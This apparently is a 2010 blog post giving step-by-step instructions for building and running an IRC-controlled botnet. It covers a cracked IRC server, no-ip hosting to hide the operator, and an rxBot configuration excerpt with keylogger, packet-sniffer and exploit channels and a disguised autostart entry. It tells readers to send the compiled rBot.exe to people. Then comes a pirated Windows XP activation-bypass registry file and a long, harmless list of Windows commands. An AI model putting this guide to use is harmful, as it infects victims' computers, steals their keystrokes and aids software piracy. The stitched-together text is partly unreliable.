Botnet

Monday, December 13, 2010

First lets download all the thing you need

1. Visual Studio 6
2. Visual Studio 6 Service Pack 5
3. Visual Studio 6.0 Processor Pack
4. Windows XP Core SDK
5. IRCPlus 1.5 + Crack (Follow the A, B, C to download)
A... (sign up to sub7)
B... (then click here to get the pass and username for the download)
c... (click here to download)
6. mIRC
7. http://www.no-ip.com account (ill go into this a bit more later on)
8. Bot Source
 
Second Lets Setup Microsoft Visual C++ 6.0
1. Run Microsoft Visual C++ 6.0 setup.exe and install it
2. Install the Service Pack 6
3. Install Windows XP SDK
4. Open up Microsoft Visual C++ Compilier 6.0
5. Go to Tools > Options and Click the "Directories" tab
6. Browse to these directories and add them to the list: (Click the dotted box to add, make sure they go in this order)
C:PROGRAM FILESMICROSOFT PLATFORM SDK
C:PROGRAM FILESMICROSOFT PLATFORM SDKBIN
C:PROGRAM FILESMICROSOFT PLATFORM SDKINCLUDE
C:PROGRAM FILESMICROSOFRT PLATFORM SDKLIB

Time To Make a No-Ip Account

This will help stop people getting your IP address.
1. Goto No-Ip.com an make an account
2. Setup a free Host redirect e.g botnet.no-ip.biz
3. Click on downloads to download your No-IP Dynamic DNS Update Client
4. Run and install the file you downloaded, now leave this for now.

Time to install your IRC_plus 1.5
This is were your host will be (were your actual IRC will be stored). Now you dont need to find/Root a box (anyways lets carry on)
1. Install IRC_plus
2. Use the crack "It will say it never worked, even tho it did :S)
3. Now open IRC plus "Remote Control"

Time to setup the mIRC client
The client is so you can connect to your host that you just setup. Without this you would never be able to see the chat room haha.
1. Install mIRC
2. Open mIRC and fill in the usual crap: like name, email, nick blah blah and press ok
3. Now click File> Select Server> Click Add> "fill it out as below"

Description: What ever you want
IRC SERVER: enterwhatyoumade.no-ip.biz (Use the no-ip DUS you made)
Ports: 6667 (this is the most common used but it can be 6000-6010, use whats in your bots config an the one you used in your host)
Group: what ever you want
Password: Password you made in IRCplus

4. Press Add> Press OK
5. Leave mIRC open, open No-IP DUC and Open IRCplus
6. Go back to mIRC and press the lightining bolt in the top left area.

You should now be connected to you server, Now type:

/OPER admin password (Make sure to change password to the one you made on your host)

/join #youchannel (make sure you replaced your channel with the one you made on your host)

You sould now be on you IRC chat room (channel). If you are then your doing good, if not start this TUT again and follow everystep to the letter dont skip ahead at any time.

Now the Bit You Have Been Waiting For: Setting Up Your Bot
1. Unpack "rx-asn-2-re-worked_v3.rar" Bot Source
2. You should see an rx-asn-2-re-worked v3 folder
3. Open the rx-asn-2-re-worked v3
4. Open configs.h folder and edit these lines only
// bot configuration (generic) - doesn't need to be encrypted2001
int port = 6667;        // server port (Change to 6667 or the port your IRC uses)

:
#else  // Recommended to use this only for Crypt() setup, this is unsecure.
char botid[] = "Mr Bumbastic";       //Change to what you want the bot to be called
char version[] = "0.1";        // Change What version you want it to be called
char password[] = "password";         // change to a password you will use inside your irc so bots know its you
char server[] = "yournoipduc.no-ip.biz";        // Change to the No-ip DUC address that you made.
char serverpass[] = "paswords";        // Change to the server password you made on ICRplus host
char channel[] = "#bots";        // Change to the channel you made on ICRplus host
char chanpass[] = "";        // Best to leave this blank, we dont need we have a server password
char server2[] = "";                        // Does not work so make it blank
char channel2[] = "";                        // Does not work so make it blank
char chanpass2[] = "";                        // Does not work so make it blank
char filename[] = "crss";            // What you want your bot to be called in Task manger (i think hmmm)
char keylogfile[] = "keylog";                // keylog filename (says it all haha
char valuename[] = "Microsoft";        // value name for autostart (not to important so leave it as microsoft)
char nickconst[] = "zombie";                    // change to first part to the bot's nickname in IRC
char szLocalPayloadFile[]=".exe";    // What you want your bot to be called in Task manger
char modeonconn[] = "-xi+B";                    // Havnt got a clue so just leave it
char exploitchan[] = "#bots";                        // Channel where exploit messages get redirected
char keylogchan[] = "#bots";                        // Channel where keylog messages get redirected
char psniffchan[] = "#bots";                        // Channel where psniff messages get redirected

5. Save it and close Visual Studio 6
6. Now open the rx-asn-2-re-worked v3 folder again > open rBot.dsw
7. Now right click Rbot file and click build.

1. Download and unpack: Rxbot 7.6 (212.3 kb) Mirror 2 Mirror 3 2. You should see an Rxbot 7.6 folder 3. Open the Rxbot 7.6 > configs.h folder and edit these lines only:

8. Your botnet will be save in rx-asn-2-re-worked v3> Debug folder
9. Send this to people rBot.exe to people

Lastly Using the bot
Firstly i am just going to give you very basic commands to use. Make sure you have mIRC, No-IP DUC, IRCplus running and have some bots already.
1. Ok now connect to your server using mIRC
2. Make sure your the admin (/oper admin password)
3. Use the commands
.Login botpassword
(You have to do this first so the bots listen to you, make sure botpassword is what you set in config.h)

.Remove (in case you opened it on your pc, also removes from other pc's and leaves nothing behind)

Validate Windows

1) Open Notepad
2) Paste the following code
Windows Registry Editor Version 5.00

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion]
    "CurrentBuild"="1.511.1 () (Obsolete data - do not use)"
    "ProductId"="55274-640-7450093-23464"
    "DigitalProductId"=hex:a4,00,00,00,03,00,00,00 ,35, 35,32,37,34,2d,36,34,30,2d,\
    37,34,35,30,30,39,33,2d,32,33,34,36,34,00,2e,00,00 ,00,41,32,32,2d,30,30,30,\
    30,31,00,00,00,00,00,00,00,62,fc,61,4c,e0,26,33,16 ,05,d3,54,e7,a0,de,00,00,\
    00,00,00,00,49,36,c2,49,20,47,0c,00,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,33,33,35,30,30,00 ,00,00,00,00,00,00,65,10,\
    00,00,74,99,dd,b0,f7,07,00,00,98,10,00,00,00,00,00 ,00,00,00,00,00,00,00,00,\
    00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00 ,c4,ae,d6,1c
    "LicenseInfo"=hex:e7,77,18,19,f8,08,fc,7d,e8,f 0,df ,12,6e,46,cb,3f,ad,b2,dd,b9,\
    15,18,16,c0,bc,c3,6a,7d,4a,80,8b,31,13,37,5a,78,a2 ,06,c8,6b,b9,d9,dd,cc,6a,\
    9c,c5,9b,77,aa,07,8d,56,6a,7c,e4

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WPAEvents]
    "OOBETimer"=hex:ff,d5,71,d6,8b,6a,8d,6f,d5,33, 93,f d

3) In notepad click File menu then Save.
4) For file type in the save dialog box select "All Files" and for the filename type in ValidateXP.reg or whatever you want. It doesn't matter as long as it has the .reg extension.
5) Click Save.

6) Now, double-click the file.
7) It will ask you "Are you sure...?".
8 ) Tell It "Hell Yes" and press OK.

You may need to restart your computer

Windows Command

Run Commands

compmgmt.msc - Computer management
devmgmt.msc - Device manager
diskmgmt.msc - Disk management
dfrg.msc - Disk defrag
eventvwr.msc - Event viewer
fsmgmt.msc - Shared folders
gpedit.msc - Group policies
lusrmgr.msc - Local users and groups
perfmon.msc - Performance monitor
rsop.msc - Resultant set of policies
secpol.msc - Local security settings
services.msc - Various Services
msconfig - System Configuration Utility
regedit - Registry Editor
msinfo32 _ System Information
sysedit _ System Edit
win.ini _ windows loading information(also system.ini)
winver _ Shows current version of windows
mailto: _ Opens default email client
command _ Opens command prompt
 
Run Commands to access the control panel
appwiz.cpl -Add/Remove Programs control
timedate.cpl -Date/Time Properties control
desk.cpl -Display Properties control
findfast.cpl -FindFast control
inetcpl.cpl -Internet Properties control
main.cpl keyboard -Keyboard Properties control
main.cpl -Mouse Properties control
mmsys.cpl -Multimedia Properties control
netcpl.cpl -Network Properties control
password.cpl -Password Properties control
mmsys.cpl sounds -Sound Properties control
sysdm.cpl -System Properties control
 
Command Prompt
ANSI.SYS Defines functions that change display graphics, control cursor movement, and reassign keys.
APPEND Causes MS-DOS to look in other directories when editing a file or running a command.
ARP Displays, adds, and removes arp information from network devices.
ASSIGN Assign a drive letter to an alternate letter.
ASSOC View the file associations.
AT Schedule a time to execute commands or programs.
ATMADM Lists connections and addresses seen by Windows ATM call manager.
ATTRIB Display and change file attributes.
BATCH Recovery console command that executes a series of commands in a file.
BOOTCFG Recovery console command that allows a user to view, modify, and rebuild the boot.ini
BREAK Enable / disable CTRL + C feature.
CACLS View and modify file ACL's.
CALL Calls a batch file from another batch file.
CD Changes directories.
CHCP Supplement the International keyboard and character set information.
CHDIR Changes directories.
CHKDSK Check the hard disk drive running FAT for errors.
CHKNTFS Check the hard disk drive running NTFS for errors.
CHOICE Specify a listing of multiple options within a batch file.
CLS Clears the screen.
CMD Opens the command interpreter.
COLOR Easily change the foreground and background color of the MS-DOS window.
COMP Compares files.
COMPACT Compresses and uncompress files.
CONTROL Open control panel icons from the MS-DOS prompt.
CONVERT Convert FAT to NTFS.
COPY Copy one or more files to an alternate location.
CTTY Change the computers input/output devices.
DATE View or change the systems date.
DEBUG Debug utility to create assembly programs to modify hardware settings.
DEFRAG Re-arrange the hard disk drive to help with loading programs.
DEL Deletes one or more files.
DELETE Recovery console command that deletes a file.
DELTREE Deletes one or more files and/or directories.
DIR List the contents of one or more directory.
DISABLE Recovery console command that disables Windows system services or drivers.
DISKCOMP Compare a disk with another disk.
DISKCOPY Copy the contents of one disk and place them on another disk.
DOSKEY Command to view and execute commands that have been run in the past.
DOSSHELL A GUI to help with early MS-DOS users.
DRIVPARM Enables overwrite of original device drivers.
ECHO Displays messages and enables and disables echo.
EDIT View and edit files.
EDLIN View and edit files.
EMM386 Load extended Memory Manager.
ENABLE Recovery console command to enable a disable service or driver.
ENDLOCAL Stops the localization of the environment changes enabled by the setlocal command.
ERASE Erase files from computer.
EXIT Exit from the command interpreter.
EXPAND Expand a M*cros*ft Windows file back to it's original format.
EXTRACT Extract files from the M*cros*ft Windows cabinets.
FASTHELP Displays a listing of MS-DOS commands and information about them.
FC Compare files.
FDISK Utility used to create partitions on the hard disk drive.
FIND Search for text within a file.
FINDSTR Searches for a string of text within a file.
FIXBOOT Writes a new boot sector.
FIXMBR Writes a new boot record to a disk drive.
FOR Boolean used in batch files.
FORMAT Command to erase and prepare a disk drive.
FTP Command to connect and operate on a FTP server.
FTYPE Displays or modifies file types used in file extension associations.
GOTO Moves a batch file to a specific label or location.
GRAFTABL Show extended characters in graphics mode.
HELP Display a listing of commands and brief explanation.
IF Allows for batch files to perform conditional processing.
IFSHLP.SYS 32-bit file manager.
IPCONFIG Network command to view network adapter settings and assigned values.
KEYB Change layout of keyboard.
LABEL Change the label of a disk drive.
LH Load a device driver in to high memory.
LISTSVC Recovery console command that displays the services and drivers.
LOADFIX Load a program above the first 64k.
LOADHIGH Load a device driver in to high memory.
LOCK Lock the hard disk drive.
LOGON Recovery console command to list installations and enable administrator login.
MAP Displays the device name of a drive.
MD Command to create a new directory.
MEM Display memory on system.
MKDIR Command to create a new directory.
MODE Modify the port or display settings.
MORE Display one page at a time.
MOVE Move one or more files from one directory to another directory.
MSAV Early M*cros*ft Virus scanner.
MSD Diagnostics utility.
MSCDEX Utility used to load and provide access to the CD-ROM.
NBTSTAT Displays protocol statistics and current TCP/IP connections using NBT
NET Update, fix, or view the network or network settings
NETSH Configure dynamic and static network information from MS-DOS.
NETSTAT Display the TCP/IP network protocol statistics and information.
NLSFUNC Load country specific information.
NSLOOKUP Look up an IP address of a domain or host on a network.
PATH View and modify the computers path location.
PATHPING View and locate locations of network latency.
PAUSE Command used in batch files to stop the processing of a command.
PING Test / send information to another network computer or network device.
POPD Changes to the directory or network path stored by the pushd command.
POWER Conserve power with computer portables.
PRINT Prints data to a printer port.
PROMPT View and change the MS-DOS prompt.
PUSHD Stores a directory or network path in memory so it can be returned to at any time.
QBASIC Open the QBasic.
RD Removes an empty directory.
REN Renames a file or directory.
RENAME Renames a file or directory.
RMDIR Removes an empty directory.
ROUTE View and configure windows network route tables.
RUNAS Enables a user to execute a program on another computer.
SCANDISK Run the scandisk utility.
SCANREG Scan registry and recover registry from errors.
SET Change one variable or string to another.
SETLOCAL Enables local environments to be changed without affecting anything else.
SETVER Change MS-DOS version to trick older MS-DOS programs.
SHARE Installs support for file sharing and locking capabilities.
SHIFT Changes the position of replaceable parameters in a batch program.
SHUTDOWN Shutdown the computer from the MS-DOS prompt.
SMARTDRV Create a disk cache in conventional memory or extended memory.
SORT Sorts the input and displays the output to the screen.
START Start a separate window in Windows from the MS-DOS prompt.
SUBST Substitute a folder on your computer for another drive letter.
SWITCHES Remove add functions from MS-DOS.
SYS Transfer system files to disk drive.
TELNET Telnet to another computer / device from the prompt.
TIME View or modify the system time.
TITLE Change the title of their MS-DOS window.
TRACERT Visually view a network packets route across a network.
TREE View a visual tree of the hard disk drive.
TYPE Display the contents of a file.
UNDELETE Undelete a file that has been deleted.
UNFORMAT Unformat a hard disk drive.
UNLOCK Unlock a disk drive.
VER Display the version information.
VERIFY Enables or disables the feature to determine if files have been written properly.
VOL Displays the volume information about the designated drive.
XCOPY Copy multiple files, directories, and/or drives from one location to another.
TRUENAME When placed before a file, will display the whole directory in which it exists
TASKKILL It allows you to kill those unneeded or locked up applications